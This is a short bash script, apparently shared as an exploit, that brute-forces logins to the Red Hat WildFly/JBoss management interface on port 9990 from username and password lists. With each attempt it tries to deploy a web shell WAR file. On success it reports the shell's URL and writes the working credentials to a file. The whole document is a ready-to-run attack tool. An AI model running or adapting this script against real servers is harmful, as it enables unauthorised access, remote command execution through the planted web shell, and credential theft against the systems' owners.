redhat wildfly jboss shell brutforce Management Interface

1. #!/bin/bash
2. # Sun Feb 18 14:17:10 CET 2018
3. JBOSSBIN="."
4. WAR="/opt/war/shell.war"
5. HOST=$1
6. passlist="passwordlist.txt"
7. userlist="userlist.txt"
8. saveas="SUCCESS_eap.txt"
9.  
10. function exploit {
11. echo -e "
12.         This module attempts to login to redhat wildfly,
13.         jboss instance using username and password combinations
14.        "
15. while IFS='' read -r usr || [[ -n "$usr" ]]; do
16.    while IFS='' read -r passwd || [[ -n "$passwd" ]]; do
17.          if [[ $($JBOSSBIN/jboss-cli.sh -c controller=$HOST:9990 --user=$usr --password=$passwd --command="deploy $WAR" | awk {'print $1'} | awk NR==1) ==  "Failed" ]]
18.          then
19.             echo "[-] Fail login with user: $usr AND password: $passwd"
20.          else
21.             echo "[+] Correct credentials ..."
22.             echo -e " |  Success login with user: $usr AND password: $passwd"
23.             echo -e " |  Shell available on: http://$HOST:8080/shell"
24.             echo -e " |  Management Interface available on: http://$HOST:9990"
25.             echo -e " |_ Write credential to : $saveas"
26.             echo -e "$HOST:9990 - $usr:$passwd" >> $saveas
27.             exit
28.          fi
29.     done < "$passlist"
30. done < "$userlist"
31. }
32. exploit